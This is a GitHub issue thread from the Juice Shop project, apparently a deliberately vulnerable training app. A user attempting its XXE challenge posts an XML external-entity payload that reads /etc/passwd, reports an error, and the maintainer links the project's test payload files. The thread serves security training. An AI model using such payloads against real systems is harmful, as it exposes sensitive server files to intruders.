### ISSUE TITLE
Entity 'xxe' not defined [🐛] 

### ISSUE THREAD

**Issue by June-Han** [juice-shop/juice-shop#1508]
# :bug: Bug report

## Description

A clear and concise description of the problem...
Doing the 3 stars xxe task, used complaint to submit xml file. 

## :microscope: Minimal Reproduction

 Submitted xml file and it returned Entity &#39;xxe&#39; not defined.

## :fire: Exception or Error

<pre>
Code in file:
!?xml version="1.0" encoding="UTF-8"?!
!DOCTYPE foo [ 
   !ELEMENT foo ANY!
   !ENTITY xxe SYSTEM "file:///etc/passwd"! ]!
!foo!&xxe;!/foo!

Replaced all <> with ! as the code isn't showing
Error: 
B2B customer complaints via file upload have been deprecated for security reasons: Entity &#39;xxe&#39; not defined</pre>

## :deciduous_tree: Your Environment

<pre><code>
Localhost latest juice shop

</code></pre>

**Comment by bkimminich** [comment]
Please try if it works with <https://raw.githubusercontent.com/bkimminich/juice-shop/master/test/files/xxeForLinux.xml> or <https://raw.githubusercontent.com/bkimminich/juice-shop/master/test/files/xxeForWindows.xml> in case you are actually running Juice Shop on Windows.

**Comment by June-Han** [comment]
Not very sure what's the difference as I found them to be the same as what I have written, but the linked document works. Thank you!
